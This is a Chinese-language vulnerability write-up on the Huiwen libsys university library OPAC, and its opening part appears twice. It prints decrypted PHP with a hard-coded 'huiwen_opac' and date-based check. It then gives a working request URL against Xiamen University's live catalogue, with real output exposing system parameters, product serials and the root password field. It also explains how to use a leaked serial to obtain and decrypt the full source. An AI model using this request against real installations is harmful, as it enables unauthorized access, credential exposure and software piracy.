#### 0x00 介绍 汇文的libsys图书馆opac系统是高校使用得比较多的系统,用户有厦大,南京大学,大连理工,南开大学等多所学校。系统使用的是Oracle+php,无法从公开触到获取源码。 #### 0x01 获取代码 在汇文图书馆的官网上,可以下载到一些补丁,如截图所示。  下载OPAC重要安全BUG更新,可以看到一部分php文件,php使用了DeZend加密,可以使用工具解密,其中,/opac/ajax_libsys_view.php文件代码如下所示 ```php <?php /*********************/ /* */ /* Dezend for PHP5 */ /* NWS */ /* Nulled.WS */ /* */ /*********************/ require_once( "common.php" ); require_once( "../include/hwopacpwd.php" ); $pwd = $_REQUEST['code']; $crc = $_REQUEST['crc']; $date = strrev( date( "md" ) ); if ( $pwd != "huiwen_opac" || $date != $crc ) { echo "ERROR"; return; } $ary = array( ); $strSql = " SELECT * from v\$version "; $stmt = $dbh->prepare( $strSql ); $stmt->execute( ); $mode = OCI_FETCHSTATEMENT_BY_ROW; $version = $stmt->fetchall( $mode ); $i = 0; for ( ;$i < count( $version );++$i) { $ary[] = array( "or" => $version[$i]['BANNER'] ); } $strSql = "SELECT sys_para_code,sys_para_value FROM sys_comm_para where...
#### 0x00 介绍 汇文的libsys图书馆opac系统是高校使用得比较多的系统,用户有厦大,南京大学,大连理工,南开大学等多所学校。系统使用的是Oracle+php,无法从公开触到获取源码。 #### 0x01 获取代码 在汇文图书馆的官网上,可以下载到一些补丁,如截图所示。  下载OPAC重要安全BUG更新,可以看到一部分php文件,php使用了DeZend加密,可以使用工具解密,其中,/opac/ajax_libsys_view.php文件代码如下所示 ```php <?php /*********************/ /* */ /* Dezend for PHP5 */ /* NWS */ /* Nulled.WS */ /* */ /*********************/ require_once( "common.php" ); require_once( "../include/hwopacpwd.php" ); $pwd = $_REQUEST['code']; $crc = $_REQUEST['crc']; $date = strrev( date( "md" ) ); if ( $pwd != "huiwen_opac" || $date != $crc ) { echo "ERROR"; return; } $ary = array( ); $strSql = " SELECT * from v\$version "; $stmt = $dbh->prepare( $strSql ); $stmt->execute( ); $mode = OCI_FETCHSTATEMENT_BY_ROW; $version = $stmt->fetchall( $mode ); $i = 0; for ( ;$i < count( $version );++$i) { $ary[] = array( "or" => $version[$i]['BANNER'] ); } $strSql = "SELECT sys_para_code,sys_para_value FROM sys_comm_para where sys_para_code in ('01','02','14','16','17','24','47','98','99','ACS','RFID','THREE-M' ) order by 1 "; $stmt = $dbh->prepare( $strSql ); $stmt->execute( ); $mode = OCI_FETCHSTATEMENT_BY_ROW; $para = $stmt->fetchall( $mode ); $i = 0; for ( ;$i < count( $para );++$i) { $ary[] = array( trim( $para[$i]['SYS_PARA_CODE'] ) => str2utf8( $para[$i]['SYS_PARA_VALUE'] ) ); } $strSql = "SELECT password FROM lib_worker where wkr_no='ROOT' "; $stmt = $dbh->prepare( $strSql ); $stmt->execute( ); $root = $stmt->fetch( ); $ary[] = array( "RT" => $root['PASSWORD'] ); $strSql = " select count(*) as cnt from marc "; $stmt = $dbh->prepare( $strSql ); $stmt->execute( ); $root = $stmt->fetch( ); $ary[] = array( "M" => $root['CNT'] ); $strSql = " select count(*) as cnt from indi_acct "; $stmt = $dbh->prepare( $strSql ); $stmt->execute( ); $root = $stmt->fetch( ); $ary[] = array( "I" => $root['CNT'] ); $strSql = " select count(*) as cnt from reader where redr_flag=1 "; $stmt = $dbh->prepare( $strSql ); $stmt->execute( ); $root = $stmt->fetch( ); $ary[] = array( "R" => $root['CNT'] ); foreach ( $ary as $item ) { print_r( $item ); echo "<br/>"; } ?> ``` 可以看到,只要输入正确的code和crc即可执行if逻辑后面的一系列sql查询语句。 以厦门大学为例:http://opac.xmulib.org/opac/ajax_libsys_view.php?code=huiwen_opac&crc=8011 crc为月份日期按照倒序排列,例如今天是11月8日,则为1108倒序,即8011,结果如下: ``` Array ( [or] => Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi ) Array ( [or] => PL/SQL Release 10.2.0.1.0 - Production ) Array ( [or] => CORE10.2.0.1.0Production ) Array ( [or] => TNS for Solaris: Version 10.2.0.1.0 - Production ) Array ( [or] => NLSRTL Version 10.2.0.1.0 - Production ) Array ( [01] => 厦门大学 ) Array ( [02] => http://210.34.4.28 ) Array ( [14] => XMU,235010 ) Array ( [16] => 7050-7901-9735-7268-7661-9231-6348 ) Array ( [17] => Enterprise ) Array ( [24] => 5048535745485245495545207195195197180243209167205188202233185221 ) Array ( [47] => 0 ) Array ( [98] => 3174-19803-0843-1589-15002 ) Array ( [99] => 5.5.10 ) Array ( [RFID] => 2640-011-913-785 ) Array ( [THREE-M] => 2640-011-913-785 ) Array ( [RT] => ) Array ( [M] => 2332777 ) Array ( [I] => 4495757 ) Array ( [R] => 85492 ) ``` 其中,7050-7901-9735-7268-7661-9231-6348即为产品序列号,可以去官网下载完整安装包。  安装,在hwweb下即为php源码,使用Dezend解密程序解密即可拿到所有源码
